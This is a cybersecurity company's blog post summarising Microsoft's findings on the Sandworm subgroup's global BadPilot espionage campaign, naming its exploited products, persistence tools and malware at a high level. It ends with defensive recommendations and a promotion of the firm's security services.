Microsoft has identified a sophisticated cyber espionage operation carried out by a subgroup within Sandworm, the notorious Russian state-sponsored hacking collective. The operation, codenamed BadPilot, has been active since at least 2021, targeting internet-facing infrastructure in over 15 countries. This marks a significant expansion beyond Sandworm’s previous focus on Eastern Europe, with attacks now observed in North America, South America, Asia, and Africa.
Sandworm’s Expanding Reach
While Sandworm has historically concentrated on Ukraine, its latest activities indicate a shift in strategy. Microsoft’s findings reveal that high-value targets include government agencies, energy and telecommunications providers, arms manufacturers, and logistics firms. Countries affected by this operation include the United States, Canada, the United Kingdom, Australia, India, China, Turkey, Argentina, and Nigeria.
The scale of this campaign suggests that Russia is investing heavily in broadening its cyber capabilities, ensuring access to strategic infrastructure across multiple regions. Sandworm’s subgroup appears to be pursuing both opportunistic mass compromises and targeted intrusions, indicating a desire to maintain persistent access across various industries.
Exploiting Vulnerabilities for Initial Access
To gain a foothold in target environments, the hacking group exploits publicly known security vulnerabilities in widely used software. Microsoft has identified multiple flaws that have been actively leveraged in these attacks, including vulnerabilities in Microsoft Exchange Server, Fortinet FortiClient, Zimbra Collaboration, and JetBrains TeamCity.
By taking advantage of unpatched systems, Sandworm secures initial access to corporate and government networks, allowing it to establish long-term persistence. From there, the attackers deploy tools for credential harvesting, privilege escalation, and lateral movement within compromised organizations.
Maintaining Persistence and Avoiding Detection
Once inside a network, the attackers use various tactics to ensure prolonged access. Microsoft has observed Sandworm deploying legitimate remote administration tools, such as Atera Agent and Splashtop Remote Services, which allow them to blend in with regular IT activity. Additionally, the group has been seen installing OpenSSH and a custom TOR-based backdoor called ShadowLink, which enables covert access via the TOR anonymity network.
Another method involves modifying Outlook Web Access (OWA) login pages to inject JavaScript code that captures and exfiltrates credentials in real time. These alterations allow attackers to maintain access even if security teams attempt to lock them out.
The use of web shells is another persistent tactic. The hacking group has deployed a custom shell known as LocalOlive, which serves as a hidden entry point for follow-up payloads, such as tunneling utilities and malware designed for deeper network penetration.
Cybercrime as a State-Sponsored Tool
One of the most concerning aspects of Sandworm’s operations is its increasing reliance on cybercriminal infrastructure. Microsoft and Google’s Threat Intelligence Groups have reported that the group frequently purchases access to compromised systems through underground forums, using tools originally designed for cybercriminals.
By leveraging malware such as DarkCrystal RAT (DCRat), Warzone, and Rhadamanthys Stealer, Sandworm can rapidly scale its operations without relying solely on in-house tools. The group also utilizes bulletproof hosting services from known cybercriminal actors, allowing them to conduct attacks with minimal risk of attribution.
Trojanized Software and Fake Windows Updates
Recent research from cybersecurity firms EclecticIQ and Mandiant has revealed that Sandworm is now using fake software activators and trojanized Windows updates to spread malware. These methods are particularly effective in regions like Ukraine, where the use of pirated software is widespread.
One example is the Kalambur backdoor, which masquerades as a legitimate Windows security update. Once installed, it enables remote access via the Remote Desktop Protocol (RDP) while routing connections through TOR, making it difficult to track.
This technique aligns with Sandworm’s broader strategy of targeting industrial control systems (ICS) and critical infrastructure by embedding malware into widely used applications. By exploiting organizations’ reliance on untrusted software, the group gains access to key systems without having to rely on traditional hacking techniques.
The Bigger Picture: A Shifting Cyber Warfare Landscape
Microsoft’s report highlights the evolving nature of Russian cyber operations. Sandworm’s shift from regionally focused attacks to a global cyber espionage campaign reflects broader geopolitical ambitions. The group’s ability to combine state-backed hacking with cybercriminal tactics makes it an increasingly dangerous threat.
With access to a growing number of compromised networks, Sandworm is positioned to conduct espionage, disrupt critical industries, and establish long-term footholds in strategic sectors. These activities are likely aligned with the Kremlin’s long-term geopolitical objectives, giving Russia the ability to engage in cyber warfare on a massive scale.
How Organizations Can Defend Against Sandworm Attacks
To mitigate the risk posed by Sandworm and similar state-sponsored threats, organizations must adopt a proactive cybersecurity strategy. Keeping software up to date is critical, as the group primarily exploits known vulnerabilities. Implementing network segmentation can limit attackers’ ability to move laterally within an environment, reducing the impact of a successful breach.
Security teams should also invest in endpoint detection and response (EDR) solutions to monitor suspicious activity in real time. A zero-trust security model, which continuously verifies users and devices before granting access, can help prevent unauthorized lateral movement.
Given the increasing sophistication of cyber threats, threat intelligence monitoring is essential. Organizations must stay informed about the latest APT tactics and adjust their defenses accordingly. As cyber warfare continues to evolve, maintaining a strong security posture will be crucial in defending against nation-state actors.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
https://www.netizen.net/contact
